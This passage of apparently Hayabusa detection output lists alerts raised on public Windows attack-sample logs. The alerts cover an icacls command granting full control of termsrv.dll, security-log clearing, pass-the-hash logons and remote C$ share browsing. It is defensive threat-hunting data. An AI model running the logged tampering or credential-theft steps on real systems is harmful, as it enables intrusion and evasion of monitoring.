""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: 
""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: 
user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,informational,Logon Type 9 - NewCredentials,User: user01 : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x4530f0f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: user01 : LogonID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: 
RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:22.284 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: BGinfo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\account$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures : IP Address: 
